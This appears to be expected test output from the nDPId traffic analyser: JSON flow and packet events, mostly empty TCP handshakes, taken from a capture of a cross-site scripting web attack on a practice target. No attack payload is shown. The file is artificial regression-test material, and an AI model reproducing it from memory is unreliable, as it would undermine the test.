-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":1499347480438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347480438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UJlAAD4GdTesEAABwKgKMuEsAFBzZ4wwAAAAAKACchCgCwAAAgQFtAQCCAoBOtypAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4279,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":2,"flow_last_seen":1499347480438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347480438,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4SwTIR0Qc2eMMaAScSC+tQAAAgQFtAQCCAoD5K4fATrcqQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":3,"flow_last_seen":1499347480439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347480439,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UJpAAD4GdT6sEAABwKgKMuEsAFBzZ4wxEyEdEYAQAOVdvQAAAQEICgE63KkD5K4f"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4290,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347481724,"flow_last_seen":1499347481724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347481724,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57658,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4290,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":1499347481724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347481724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8fSpAAD4GSKasEAABwKgKMuE6AFDTgqDBAAAAAKACchAqDwAAAgQFtAQCCAoBOt3rAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":2,"flow_last_seen":1499347481724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347481724,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4TowvlKP04KgwqAScSD0WwAAAgQFtAQCCAoD5K9gATrd6wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":3,"flow_last_seen":1499347481725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347481725,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0fStAAD4GSK2sEAABwKgKMuE6AFDTgqDCML5SkIAQAOWTYwAAAQEICgE63esD5K9g"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347484263,"flow_last_seen":1499347484263,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347484263,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":1499347484263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347484263,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UOVAAD4GdOusEAABwKgKMuFUAFABZrCAAAAAAKACchDp2AAAAgQFtAQCCAoBOuBlAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":2,"flow_last_seen":1499347484263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347484263,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4VQEZrkRAWawgaAScSB3gAAAAgQFtAQCCAoD5LHbATrgZQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4310,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":3,"flow_last_seen":1499347484264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347484264,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UOZAAD4GdPKsEAABwKgKMuFUAFABZrCBBGa5EoAQAOUWhwAAAQEICgE64GYD5LHb"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347485533,"flow_last_seen":1499347485533,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485533,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1499347485533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347485533,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jaZAAD4GOCqsEAABwKgKMuFiAFALNGwFAAAAAKACchAjOgAAAgQFtAQCCAoBOuGjAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":2,"flow_last_seen":1499347485533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347485533,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4WJ5n4cfCzRsBqAScSBsXQAAAgQFtAQCCAoD5LMYATrhowEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4322,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":3,"flow_last_seen":1499347485534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347485534,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jadAAD4GODGsEAABwKgKMuFiAFALNGwGeZ+HIIAQAOULZQAAAQEICgE64aMD5LMY"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347356478,"flow_last_seen":1499347361716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347356478,"flow_last_seen":1499347361716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347357727,"flow_last_seen":1499347363716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56334,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347357727,"flow_last_seen":1499347363716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347360285,"flow_last_seen":1499347365717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347360285,"flow_last_seen":1499347365717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347361540,"flow_last_seen":1499347366717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56374,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347361540,"flow_last_seen":1499347366717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56374,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347364056,"flow_last_seen":1499347369718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347364056,"flow_last_seen":1499347369718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4335,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347486787,"flow_last_seen":1499347486787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347486787,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57712,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4335,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1499347486787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347486787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D7tAAD4GthWsEAABwKgKMuFwAFB2mu1nAAAAAKACchA1KgAAAgQFtAQCCAoBOuLcAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4336,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":2,"flow_last_seen":1499347486787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347486787,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4XA0h5CedprtaKAScSC4rAAAAgQFtAQCCAoD5LRSATri3AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":3,"flow_last_seen":1499347486787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347486787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D7xAAD4GthysEAABwKgKMuFwAFB2mu1oNIeQn4AQAOVXtAAAAQEICgE64twD5LRS"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4344,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347484263,"flow_last_seen":1499347487799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347487799,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347489408,"flow_last_seen":1499347489408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347489408,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1499347489408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347489408,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86N5AAD4G3PGsEAABwKgKMuGKAFByXg2yAAAAAKACchAWcgAAAgQFtAQCCAoBOuVsAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":2,"flow_last_seen":1499347489408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347489408,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4YpoWWpFcl4Ns6AScSCJ7AAAAgQFtAQCCAoD5LbhATrlbAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4356,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":3,"flow_last_seen":1499347489409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347489409,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06N9AAD4G3PisEAABwKgKMuGKAFByXg2zaFlqRoAQAOUo9AAAAQEICgE65WwD5Lbh"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347490659,"flow_last_seen":1499347490659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347490659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":1499347490659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347490659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8roVAAD4GF0usEAABwKgKMuGYAFBT40ghAAAAAKACchD5NwAAAgQFtAQCCAoBOuakAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4364,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":2,"flow_last_seen":1499347490659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347490659,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4ZjtXjkmU+NIIqAScSAXkwAAAgQFtAQCCAoD5LgaATrmpAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":3,"flow_last_seen":1499347490660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347490660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0roZAAD4GF1KsEAABwKgKMuGYAFBT40gi7V45J4AQAOW2mQAAAQEICgE65qUD5Lga"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4384,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347493167,"flow_last_seen":1499347493167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347493167,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4384,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":1499347493167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347493167,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VdJAAD4Gb\/6sEAABwKgKMuGyAFCUXbzFAAAAAKACchBBjAAAAgQFtAQCCAoBOukXAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":2,"flow_last_seen":1499347493167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347493167,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4bJdzKzTlF28xqAScSB5WQAAAgQFtAQCCAoD5LqNATrpFwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4386,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":3,"flow_last_seen":1499347493168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347493168,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VdNAAD4GcAWsEAABwKgKMuGyAFCUXbzGXcys1IAQAOUYYAAAAQEICgE66RgD5LqN"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4393,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347494446,"flow_last_seen":1499347494446,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347494446,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4393,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":1499347494446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347494446,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8G1FAAD4Gqn+sEAABwKgKMuHAAFAmKfEGAAAAAKACchB6MQAAAgQFtAQCCAoBOupXAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4394,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":2,"flow_last_seen":1499347494446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347494446,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4cATAV39JinxB6AScSBKYAAAAgQFtAQCCAoD5LvNATrqVwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4395,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":3,"flow_last_seen":1499347494447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347494447,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0G1JAAD4GqoasEAABwKgKMuHAAFAmKfEHEwFd\/oAQAOXpZwAAAQEICgE66lcD5LvN"} 